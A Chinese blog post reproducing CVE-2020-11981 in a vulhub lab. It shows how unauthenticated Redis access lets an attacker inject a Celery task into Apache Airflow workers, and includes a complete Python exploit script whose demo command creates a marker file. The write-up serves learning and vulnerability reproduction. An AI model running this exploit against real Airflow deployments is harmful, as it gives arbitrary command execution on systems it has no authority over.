vulhub中 Apache Airflow Celery 消息中间件命令执行漏洞复现(CVE-2020-11981)

于 2024-02-03 21:13:55 发布
阅读量232 收藏
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/136016039
版权

Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。

1.利用这个漏洞需要控制消息中间件,Vulhub环境中Redis存在未授权访问。通过未授权访问,攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令,参数为命令执行中所需要的数组。

2.我们可以使用[exploit_airflow_celery.py](exploit_airflow_celery.py)这个小脚本来执行命令`touch /tmp/airflow_celery_success`

pip install redis
python exploit_airflow_celery.py [your-ip]

import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) 
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
command = ['touch', '/tmp/airflow_celery_success']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))

3.执行docker compose logs airflow-worker ,可以看到如下任务消息

执行docker compose exec airflow-worker ls -l /tmp,可以看到成功创建了文件`airflow_celery_success`

余生有个小酒馆
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用
qq_51577576的博客
10-04 1612
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用 Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。这里我们使用redis的队列服务
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981
qq_51577576的博客
12-18 541
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程执行任意命令
vulhub漏洞复现四_celery
weixin_44193247的博客
01-05 2324
vulhub漏洞复现练习篇
CVE-2020-11981 Apache Airflow Celery 消息中间件命令执行漏洞复现
ierciyuan的博客
08-04 1679
CVE-2020-11981 Apache Airflow Celery 消息中间件命令执行漏洞复现。poc。
Apache Airflow Celery 消息中间件命令执行漏洞复现CVE-2020-11981
Tauil的博客
08-14 1732
利用AirflowCeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflowcelery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
Celery Redis未授权访问命令执行利用
fnmsd的博客
07-10 7148
Celery在队列间件未授权的情况下命令执行的利用。
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
weixin_44047654的博客
11-28 1006
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
Apache Airflow Celery 消息中间件命令执行CVE-2020-11981
Rin_CSDN
10-17 419
【代码】Apache Airflow Celery 消息中间件命令执行CVE-2020-11981
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
airflow-code-editor:Apache Airflow的插件,可让您在浏览器编辑DAG
04-27
您可以在[code_editor]部分添加以下任何设置来编辑airflow.cfg 。 git_cmd git命令(可选路径) git_default_args git参数添加到每个调用(默认值:-c color.ui = true) git_author_name作者/提交者易于...
airflow-client-go:Apache Airflow-Go的OpenApi客户端
05-17
"github.com/apache/airflow-client-go/airflow" ) func main () { cli := airflow . NewAPIClient ( & airflow. Configuration { Scheme : "http" , Host : "localhost:8080" , BasePath : "/api/v1" , })...
dag-factory:从YAML配置文件动态生成Apache Airflow DAG
05-13
它需要Python 3.6.0+和Apache Airflow 1.10+。 用法 在Airflow环境安装dag-factory之后,有两个步骤来创建DAG。 首先,我们需要创建一个YAML配置文件。 例如: example_dag1 : default_args : owner : ' ...
airflow-role:安装Apache Airflow的角色
01-31
这个角色负责在Debian / Ubuntu环境安装Apache Airflow服务器。 入门 这些说明将为您提供ansible剧本的角色副本。 一旦启动,它将在Debian或Ubuntu系统安装服务器。 先决条件 已安装Ansible 2.8.8版本。 库存...
awesome-apache-airflow:关于Apache Airflow的资源精选清单
01-30
awesome-apache-airflow:关于Apache Airflow的资源精选清单
terraform-aws-airflow:用于PostgreSQL支持的Apache Airflow实例的Terraform模块
02-04
terraform-aws-airflow:用于PostgreSQL支持的Apache Airflow实例的Terraform模块
airflowApache Airflow-以编程方式编写,计划和监视工作流的平台
02-05
Apache Airflow (或简称为Airflow)是一个以编程方式编写,计划和监视工作流的平台。 将工作流定义为代码时,它们将变得更具可维护性,可版本化,可测试和协作性。 使用Airflow将工作流编写为任务的有向无环图(DAG...
Python库 | apache-airflow-providers-apache-spark-2.1.3.tar.gz
04-06
资源分类:Python库 所属语言:Python 资源全名:apache-airflow-providers-apache-spark-2.1.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
docker-airflow:Docker Apache Airflow
02-05
该存储库包含 airflow的Dockerfile ,用于将的发布到公共。 资讯资讯 基于Python(3.7-slim-buster)官方图片并使用作为后端, 作为队列 安装 安装 遵循的Airflow版本发布 安装 从Docker存储库提取映像。 ...
ansible-airflow:安装Apache Airflow的角色
05-24
使用Ansible安装Airflow。 该Ansible角色还支持使用Marathon启动Ansible。 在这种情况下,请使用变量marathon_version指定所使用的Marathon的版本。 支持的系统: Ubuntu 16.04 RedHat / Centos 7.2 Ansible...
CVE-2020-11978
最新发布
08-10
回答:CVE-2020-11978是Apache Airflow的一个命令注入漏洞。根据引用提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值